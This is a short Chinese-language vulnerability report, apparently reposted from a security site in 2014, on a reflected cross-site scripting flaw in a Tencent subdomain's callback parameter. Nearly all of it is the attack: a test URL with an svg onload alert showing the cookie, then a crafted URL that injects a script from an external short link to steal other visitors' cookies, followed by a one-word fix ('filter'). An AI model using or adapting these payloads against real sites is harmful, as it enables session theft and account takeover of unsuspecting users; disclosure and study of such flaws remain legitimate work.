腾讯某分站反射型跨站下载

来源：黑吧安全网　浏览：910次　时间：2014-04-30

做网站找雨过天晴工作室

腾讯分站反射型跨站可获取小甜饼

详细说明：

1：访问http://sync.coral.qq.com/t/1000269489?source=1&callback=1014xxx%3Csvg/onload=alert%28document.cookie%29%3E&_=1376185737425

漏洞证明：

2：构造获取cookie的链接：

http://sync.coral.qq.com/t/1000269489?source=1&callback=1014xxx%3Csvg/onload=%22var/**/s=document.createElement%28%27script%27%29;s.src=%27http://t.cn/zl70EH3%27;document.body.appendChild%28s%29;%22%3E&_=1376185737425

可获取别人cookie：

修复方案：

过滤！！

上一篇：海尔集团之14某非常重要系统很有姿势的SQL注射下载
下一篇： Haier CRM后台管理系统未授权访问下载